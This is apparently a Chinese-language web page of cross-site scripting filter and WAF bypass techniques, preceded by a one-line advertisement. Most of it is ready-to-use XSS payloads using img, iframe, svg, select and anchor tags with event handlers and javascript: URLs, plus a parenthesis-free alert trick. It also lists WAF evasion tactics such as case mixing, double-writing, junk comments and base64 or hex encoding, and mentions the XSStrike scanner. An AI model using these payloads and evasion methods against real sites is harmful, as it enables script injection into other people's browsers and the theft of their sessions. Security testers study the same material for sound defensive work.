企业🤖AI智能体构建引擎,智能编排和调试,一键部署,支持知识库和私有化部署方案 广告
[TOC] ## 常见绕过方式 * 大小写混合 * 双写 ## 使用其他标签 src属性 ``` <img src=x onerror=alert(1)> <img/src=x onerror=alert(1)> <video src=x onerror=alert(1)> <audio src=x onerror=alert(1)> ``` iframe ``` <iframe src="javascript:alert(2)"> <iframe onload=alert(1)> ``` a标签 ``` <a href="javascript:onclick=alert()">test</a> <a href="javascript:alert()">test</a> ``` ## 利用事件绕过 ``` <svg onload=alert(1)> <boby onload=alert(1)> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <video><source onerror="javascript:alert(1)"> ``` ## 园括号被过滤 ~~~ <a onmouseover="javascript:window.onerror=alert;throw 1"> <img src=x onerror="javascript:window.onerror=alert;throw 1"> ~~~ ## 常规WAF绕过 标签语法替换 ``` '' "" ``` 特殊符号干扰 ``` / # ``` 提交方式更改 ``` get/post ``` 垃圾数据溢出 ``` /*asdsad*/ ``` 加密解密算法 ``` base64 16进制 ``` **结合其他漏洞绕过** ## xsstrike工具介绍 * 反射和DOM XSS扫描 * 多线程爬虫 * 检测规避WAF